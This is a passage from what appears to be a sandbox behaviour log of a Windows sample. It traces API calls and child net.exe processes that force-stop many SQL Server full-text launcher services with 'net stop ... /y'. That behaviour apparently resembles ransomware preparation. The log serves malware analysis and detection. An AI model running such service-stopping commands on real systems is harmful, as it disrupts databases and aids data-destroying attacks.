"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8273 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 8274 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 8275 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8276 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8277 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8278 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8279 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8280 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8281 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8282 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8283 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8284 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8285 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8286 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8287 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8288 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8289 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8290 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8291 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8292 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8358 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 663 os_tid = 0xc04 [0105.461] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f930 | out: lpSystemTimeAsFileTime=0x24f930*(dwLowDateTime=0xf4031030, dwHighDateTime=0x1d48689)) [0105.461] GetCurrentProcessId () returned 0x584 [0105.461] GetCurrentThreadId () returned 0xc04 [0105.461] GetTickCount () returned 0x241c0 [0105.461] QueryPerformanceCounter (in: lpPerformanceCount=0x24f938 | out: lpPerformanceCount=0x24f938*=1815238000000) returned 1 [0105.463] GetModuleHandleW (lpModuleName=0x0) returned 0xff4c0000 [0105.463] __set_app_type (_Type=0x1) [0105.463] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff4d9c9c) returned 0x0 [0105.463] __getmainargs (in: _Argc=0xff4e4780, _Argv=0xff4e4790, _Env=0xff4e4788, _DoWildCard=0, _StartInfo=0xff4e479c | out: _Argc=0xff4e4780, _Argv=0xff4e4790, _Env=0xff4e4788) returned 0 [0105.464] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.464] GetConsoleOutputCP () returned 0x1b5 [0105.591] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff4ecec0 | out: lpCPInfo=0xff4ecec0) returned 1 [0105.591] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0105.594] sprintf_s (in: _DstBuf=0x24f8d8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0105.594] setlocale (category=0, locale=".437") returned="English_United States.437" [0105.596] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0105.596] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0105.596] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y" [0105.596] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f670, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0105.596] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0105.596] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f8c8 | out: Buffer=0x24f8c8*=0x42c100) returned 0x0 [0105.596] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f8c8 | out: Buffer=0x24f8c8*=0x42c120) returned 0x0 [0105.596] _fileno (_File=0x7fefdba2a80) returned 0 [0105.596] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0105.597] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0105.597] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0105.597] _wcsicmp (_String1="config", _String2="stop") returned -16 [0105.597] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0105.597] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0105.597] _wcsicmp (_String1="file", _String2="stop") returned -13 [0105.597] _wcsicmp (_String1="files", _String2="stop") returned -13 [0105.597] _wcsicmp (_String1="group", _String2="stop") returned -12 [0105.597] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0105.597] _wcsicmp (_String1="help", _String2="stop") returned -11 [0105.597] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0105.597] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0105.597] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0105.597] _wcsicmp (_String1="session", _String2="stop") returned -15 [0105.597] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0105.597] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0105.597] _wcsicmp (_String1="share", _String2="stop") returned -12 [0105.597] _wcsicmp (_String1="start", _String2="stop") returned -14 [0105.597] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0105.597] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0105.597] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0105.597] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -12 [0105.597] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -10 [0105.597] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -10 [0105.597] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -10 [0105.597] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -10 [0105.597] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -7 [0105.598] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -7 [0105.598] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -6 [0105.598] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -6 [0105.598] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -5 [0105.598] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -5 [0105.598] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -1 [0105.598] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 3 [0105.598] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0105.598] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0105.598] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0105.598] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0105.598] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0105.598] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0105.598] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0105.598] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0105.598] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 7 [0105.598] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 8 [0105.598] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 8 [0105.598] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -12 [0105.598] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -14 [0105.598] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0105.598] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0105.598] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 1 [0105.598] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0105.598] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0105.598] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0105.599] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 10 [0105.599] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 10 [0105.599] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 10 [0105.599] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 3 [0105.599] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -9 [0105.599] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -1 [0105.599] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0105.599] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0105.599] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0105.599] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -1 [0105.599] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -12 [0105.599] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 1 [0105.599] _wcsupr (in: _String="MSSQLFDLauncher$PROFXENGAGEMENT" | out: _String="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned="MSSQLFDLAUNCHER$PROFXENGAGEMENT" [0105.600] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x42ce30 [0105.604] GetServiceKeyNameW (in: hSCManager=0x42ce30, lpDisplayName="MSSQLFDLAUNCHER$PROFXENGAGEMENT", lpServiceName=0xff4e5750, lpcchBuffer=0x24f7e8 | out: lpServiceName="", lpcchBuffer=0x24f7e8) returned 0 [0105.605] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -12 [0105.606] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -14 [0105.606] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0105.606] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0105.606] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0105.606] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0105.606] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0105.606] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 10 [0105.606] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 10 [0105.606] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 10 [0105.606] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 3 [0105.606] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -9 [0105.606] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -1 [0105.606] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 6 [0105.606] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 6 [0105.606] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 6 [0105.606] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -1 [0105.606] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -12 [0105.606] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 1 [0105.607] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$PROFXENGAGEMENT", opcode=0x0, arg=0x0, bufptr=0x24f7f0 | out: bufptr=0x24f7f0) returned 0x889 [0105.608] wcscpy_s (in: _Destination=0xff4e80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0105.608] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0105.609] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff4e5b50, nSize=0x800, Arguments=0xff4e7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0105.610] GetFileType (hFile=0xb) returned 0x2 [0105.610] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f6b8 | out: lpMode=0x24f6b8) returned 1 [0105.611] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4e5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24f6b0, lpReserved=0x0 | out: lpBuffer=0xff4e5b50*, lpNumberOfCharsWritten=0x24f6b0*=0x1e) returned 1 [0105.611] GetFileType (hFile=0xb) returned 0x2 [0105.611] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f6b8 | out: lpMode=0x24f6b8) returned 1 [0105.612] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f6b0, lpReserved=0x0 | out: lpBuffer=0xff4c1efc*, lpNumberOfCharsWritten=0x24f6b0*=0x2) returned 1 [0105.612] _ultow (in: _Dest=0x889, _Radix=2422560 | out: _Dest=0x889) returned="2185" [0105.612] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff4e5b50, nSize=0x800, Arguments=0xff4e7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0105.612] GetFileType (hFile=0xb) returned 0x2 [0105.613] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f6b8 | out: lpMode=0x24f6b8) returned 1 [0105.613] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4e5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24f6b0, lpReserved=0x0 | out: lpBuffer=0xff4e5b50*, lpNumberOfCharsWritten=0x24f6b0*=0x34) returned 1 [0105.613] GetFileType (hFile=0xb) returned 0x2 [0105.613] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f6b8 | out: lpMode=0x24f6b8) returned 1 [0105.614] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f6b0, lpReserved=0x0 | out: lpBuffer=0xff4c1efc*, lpNumberOfCharsWritten=0x24f6b0*=0x2) returned 1 [0105.614] NetApiBufferFree (Buffer=0x42c100) returned 0x0 [0105.614] NetApiBufferFree (Buffer=0x42c120) returned 0x0 [0105.614] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y" [0105.614] exit (_Code=2) Process: id = "210" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x527c5000" os_pid = "0xc10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQLFDLauncher$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8293 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8294 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8295 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8296 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 8297 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8298 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8299 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8300 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8301 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8302 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8303 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 8304 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8305 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 8306 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8307 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 664 os_tid = 0xc30 Process: id = "211" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5b7e5000" os_pid = "0x924" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQLFDLauncher$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8359 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8360 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8361 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8362 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 8363 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8364 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8365 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8366 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8367 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8368 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8369 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 8370 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8371 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 8372 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8373 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 666 os_tid = 0xa68 Process: id = "212" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x28205000" os_pid = "0x950" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQLFDLauncher$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8375 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8376 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8377 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8378 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 8379 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8380 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8381 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8382 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8383 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8384 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8385 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 8386 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8387 start_va = 0x340000 end_va = 